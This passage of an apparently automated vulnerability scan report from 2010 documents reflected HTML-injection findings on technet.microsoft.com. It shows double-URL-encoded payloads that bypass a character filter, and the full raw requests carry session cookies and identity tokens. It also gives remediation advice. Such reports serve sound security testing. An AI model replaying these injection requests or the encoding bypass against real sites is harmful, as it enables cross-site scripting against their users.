17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:23:33 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library1a439"><a>d85afdcabe5/bb727044" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4eb19%2522%253e%253ca%253ead18d4fc7be was submitted in the REST URL parameter 3. This input was echoed as 4eb19"><a>ad18d4fc7be in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727044.aspx4eb19%2522%253e%253ca%253ead18d4fc7be HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10211 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:24:13 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727044.aspx4eb19"><a>ad18d4fc7be" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c2f4%2522%253e%253ca%253e3d2075862fe was submitted in the REST URL parameter 1. This input was echoed as 8c2f4"><a>3d2075862fe in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us8c2f4%2522%253e%253ca%253e3d2075862fe/library/bb727046.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10201 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:23:32 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us8c2f4"><a>3d2075862fe/library/bb727046" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84794%2522%253e%253ca%253e2e6e2b293eb was submitted in the REST URL parameter 2. This input was echoed as 84794"><a>2e6e2b293eb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library84794%2522%253e%253ca%253e2e6e2b293eb/bb727046.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:24:17 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library84794"><a>2e6e2b293eb/bb727046" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ac1e%2522%253e%253ca%253e503fa01d590 was submitted in the REST URL parameter 3. This input was echoed as 4ac1e"><a>503fa01d590 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb727046.aspx4ac1e%2522%253e%253ca%253e503fa01d590 HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10210 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:25:12 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb727046.aspx4ac1e"><a>503fa01d590" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fc60%2522%253e%253ca%253e2c269684de0 was submitted in the REST URL parameter 1. This input was echoed as 9fc60"><a>2c269684de0 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us9fc60%2522%253e%253ca%253e2c269684de0/library/bb727048.aspx HTTP/1.1 Host: technet.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Length: 10200 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: Sto.UserLocale=en-us; path=/ X-AspNetMvc-Version: 2.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sat, 11 Dec 2010 18:24:06 GMT
